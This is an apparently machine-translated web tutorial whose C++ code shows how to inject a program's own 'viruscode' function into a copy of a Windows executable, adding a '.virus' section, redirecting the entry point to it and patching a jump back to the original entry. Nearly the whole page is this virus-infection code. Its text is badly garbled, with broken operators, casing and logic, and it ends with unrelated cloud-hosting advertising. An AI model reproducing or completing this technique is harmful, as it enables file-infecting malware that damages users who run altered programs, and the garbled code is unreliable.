When we program information security, we often need to insert our own source code into the EXE file,
How can we implement it in code. See the code and comments
# Include <iostream. h> # include <windows. h> # include <stdio. h> ////////////////////////////////////// //////////////////////////////////////** **************************************** * *********************** // ********* The following is the program code ** *****//********************************* **********************************////// //////////////////////////////////////// /// // void viruscode () {_ ASM {mov eax, 5} return ;} //////////////////////////////////////// ////////////////////////////////////**** **************************************** ********************** // ********* main function ****** *//************************************* ******************************////////// //////////////////////////////////////// //// // void main () {//************************************* ******************************//** * ***** First obtain the start address and end address of the program code, code length *******//***************************** **************************************// //////////////////////////////////////// /// // ******** variable description ****** * // ** dwfunbegaddr: start address of the program function // ** dwfunendaddr: end address of the program function // ** dwfuncodelen: program code length // ** dwjmpoff: the offset from the JMP area of the program function to the real entry // ** pmove: temporary pointer variable //////////////////////////////////// ///////////////////// // DWORD dwfunbegaddr, dwjmp Off, dwfunendaddr, dwfuncodelen; pbyte pmove = NULL; // ******* point to the JMP command of the program function ****** pmove = (pbyte) viruscode; cout <"the JMP address of the function is:" <(pvoid) pmove <Endl; // ******* locate the offset behind JMP ******* pmove ++; // ******* assign the offset value to the variable ******* dwjmpoff = * (pdword) pmove ); // ******* address of the next JMP command (code + 5) + offset to obtain the real entry address of the function ******** dwfunbegaddr = (DWORD) viruscode + 5 + dwjmpoff; cout <"jump offset of function JMP:" <(pvoid) dwjmpoff <Endl; cout <"Start Address: "<(pvoid) dwfunbegaddr <Endl; // ******* the function end address is obtained through the search below ******** // ******** first, the function entry address is assigned give the variable ****** pmove = (pbyte) dwfunbegaddr; // ******* search backward until the end ******** while (! (* (Pmove + 1) = 0xc3) & (* pmove = 0x5d) & (* (pmove-1) = 0xe5 ))) {pmove ++ ;} // ******* pmove points to the first directive of RET ******** // ********* pmove moves 5 bytes to the back, it is the JMP command placeholder ****** pmove + = 5 for the program code; dwfunendaddr = (DWORD) pmove; cout <"the end address of the Code is: "<(pvoid) dwfunendaddr <Endl; // ******* end address minus start address, get the code length ****** dwfuncodelen = dwfunendaddr-dwfunbegaddr; cout <"total code length:" <(INT) dwfuncodelen <Endl; //******************************* ************************************//** *******//***************** **************************************** ********* Handle hfile, hmapfile; lpvoid pmapoffile = NULL; //************************************** * **************************** // ********* detect files legality *******//****************************** *************************************//* * ****** open the file ******* hfile = createfile ("test.exe ", g Eneric_read, file_share_read | file_share_write, null, open_existing, file_attribute_archive, null); If (invalid_handle_value = hfile) {cout <"createfile error! "<Endl; return;} // ******** create a file ing ******* hmapfile = createfilemapping (hfile, null, page_readonly, 0, 0, null); If (! Hmapfile) {cout <"createfilemapping error! "<Endl; goto closefilehandle;} // ******* map the file to the memory ******** pmapoffile = mapviewoffile (hmapfile, file_map_read, 0, 0, 0); If (! Pmapoffile) {cout <"mapviewoffile error! "<Endl; goto closemaphandle;} image_dos_header * pdosheader; // ******** DOS file header ******** pdosheader = (image_dos_header *) pmapoffile; If (pdosheader-> e_magic! = Image_dos_signature) {cout <"Check dos Header error! "<Endl; goto freeviewofmap;} image_nt_headers * pntheader; // ******* detect nt file headers ******* pntheader = (image_nt_headers *) (pbyte) pdosheader + pdosheader-> e_lfanew); If (pntheader-> signature! = Image_nt_signature) {cout <"Check nt Header error! "<Endl; goto freeviewofmap ;} //************************************** * ************************ // ********* preparation **** ***//*********************************** * *************************** bool bcopy; // ******* copy the file to be added with the program code ******* bcopy = copyfile ("test.exe", "test_virus.exe ", false); If (! Bcopy) {cout <"copyfile error! "<Endl;} Handle hnewfile; // ******* open the copied file ******* hnewfile = createfile (" test_virus.exe ", generic_read | generic_write, file_share_read | file_share_write, null, open_existing, file_attribute_archive, null); If (! Hnewfile) {cout <"createfile error! "<Endl; goto freeviewofmap;} hglobal pnewfileheader; // ******* requests a memory block for the new file header, used to modify the file header information ******* pnewfileheader = globalalloc (gptr, pntheader-> optionalheader. sizeofheaders); If (! Pnewfileheader) {cout <"globalalloc error! "<Endl; goto closenewfilehandle;} // ******** use the original file header to fill this memory ******** rtlmovememory (pvoid) pnewfileheader, (pvoid) pmapoffile, pntheader-> optionalheader. sizeofheaders); image_nt_headers * pnewfilentheader; pnewfilentheader = (image_nt_headers *) (pbyte) pnewfileheader + pdosheader-> e_lfanew ); //////////////////////////////////////// ////////////////////////////////////**** * ** pointer information at this time ****** // ******** pmapoffile: original ing File start/* pdosheader: the DOS header of the original ing file, that is, the file starts, but the type is different./* pntheader: the original ing file's NT header // ******* pnewfileheader: Start of the new file // ******** pnewfilentheader: NT header of the new file /////////////////////////////////// //////////////////////////////////////// /*************************************** ************************ // ********* modify the Section Table of the new file information *******//****************************** * ********************************* int nsecnum; nsecnum = pnth Eader-> fileheader. numberofsections; image_section_header * plastsec, * pnewsec; // ******* locate the last section table in the original file ****** plastsec = (image_section_header *) (pbyte) pnewfilentheader + sizeof (image_nt_headers) + (nSecNum-1) * sizeof (image_section_header); // ****** pnewsec is the end of the last section table, that is, ****** pnewsec = plastsec + 1; // ******** modify the information related to the newly added section table ******* // ****** Add 1 ***** to the total number of section tables ***** pnewfilentheader-> fileheader. numberofsections ++; // ***** Modify the file offset of the new section ***** pnewsec-> pointertorawdata = plastsec-> pointertorawdata + plastsec-> sizeofrawdata; // ***** modify the file size of the new section ***** int nalignnum; nalignnum = dwfuncodelen/pnewfilentheader-> optionalheader. filealignment; If (dwfuncodelen % pnewfilentheader-> optionalheader. filealignment! = 0) {nalignnum ++;} pnewsec-> sizeofrawdata = nalignnum * pnewfilentheader-> optionalheader. filealignment; // ****** modify the size of all codes after alignment by Memory Page ***** nalignnum = dwfuncodelen/pnewfilentheader-> optionalheader. sectionalignment; If (dwfuncodelen % pnewfilentheader-> optionalheader. sectionalignment! = 0) {nalignnum ++;} pnewfilentheader-> optionalheader. sizeofcode + = nalignnum * pnewfilentheader-> optionalheader. sectionalignment; // ***** modify the file memory image size ***** pnewfilentheader-> optionalheader. sizeofimage + = nalignnum * pnewfilentheader-> optionalheader. sectionalignment; // ****** modify the memory offset of the new node ***** // ***** use the memory offset of the original last section to add the memory after the original last section alignment size ***** nalignnum = plastsec-> Misc. virtualsize/pnewfilentheader-> optionalheader. sectio Nalignment; If (plastsec-> Misc. virtualsize % pnewfilentheader-> optionalheader. sectionalignment! = 0) {nalignnum ++;} pnewsec-> virtualaddress = nalignnum * pnewfilentheader-> optionalheader. sectionalignment + plastsec-> virtualaddress; // ***** modify the memory size of the new section ****** pnewsec-> Misc. virtualsize = dwfuncodelen; // ***** update the attributes of the new section ***** pnewsec-> characteristics = image_scn_cnt_code | image_scn_mem_execute | image_scn_mem_read | image_scn_mem_write; // ***** update the node name ***** strcpy (char *) pnewsec-> name ,". virus "); // ****** update entry address ****** P Newfilentheader-> optionalheader. addressofentrypoint = pnewsec-> virtualaddress; bool bwrite; DWORD dwheadersize, dwwriten; dwheadersize = (DWORD) (pnewfilentheader-> optionalheader. sizeofheaders); bwrite = writefile (hnewfile, (lpvoid) pnewfileheader, dwheadersize, & dwwriten, null ); // ***** Add the program code to the file ****** DWORD dwsetfilep; // ***** locate the start of the new section in the new file ***** dwsetfilep = setfilepointer (hnewfile, pnewsec-> pointertor Awdata, null, file_begin); If (! Dwsetfilep) {cout <"setfilepointer error! "<Endl; goto closenewfilehandle;} // ***** write program code ***** bwrite = writefile (hnewfile, (lpvoid) dwfunbegaddr, dwfuncodelen, & dwwriten, null); If (! Bwrite) {cout <"Write virus code error! "<Endl; goto closenewfilehandle;} // ***** locate the end Of the file ****** dwsetfilep = setfilepointer (hnewfile, pnewsec-> pointertorawdata + pnewsec-> sizeofrawdata, null, file_begin); If (! Dwsetfilep) {cout <"setfilepointer end error! "<Endl; goto closenewfilehandle;} // ***** sets the end Of the file ***** if (! Setendoffile (hnewfile) {cout <"setendoffile error! "<Endl; goto closenewfilehandle;} // ******* modify the original portal address ******** pbyte pmodifyaddr; pmodifyaddr = (pbyte) pnewsec-> virtualaddress; pmodifyaddr + = dwfuncodelen; // printf ("% x \ n", pmodifyaddr); int nsub; // distance to jump nsub = (pbyte) (pntheader-> optionalheader. signature)-pmodifyaddr; DWORD dwmodifyloca; dwmodifyloca = pnewsec-> pointertorawdata; dwmodifyloca = dwmodifyloca + dwfuncodelen-5; // dwmodifyloca ++ ;//** * ** Locate the last five bytes of the program code ***** dwsetfilep = setfilepointer (hnewfile, dwmodifyloca, null, file_begin); If (! Dwsetfilep) {cout <"Modify address setfilepointer error! "<Endl; goto closenewfilehandle;} // ***** modify the JMP command ***** byte BJMP; BJMP = 0xe9; bwrite = writefile (hnewfile, & BJMP, 1, & dwwriten, null); If (! Bwrite) {cout <"Modify address writefile error! "<Endl; goto closenewfilehandle;} // ***** modify the jump address ***** bwrite = writefile (hnewfile, & nsub, 4, & dwwriten, null); If (! Bwrite) {cout <"Modify address writefile error! "<Endl; goto closenewfilehandle ;} //************************************** * ************************* // ********* tail scanning *** ****//********************************** * **************************** closenewfilehandle: closehandle (hnewfile); freeviewofmap: unmapviewoffile (pmapoffile); closemaphandle: closehandle (hmapfile); closefilehandle: closehandle (hfile );}
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
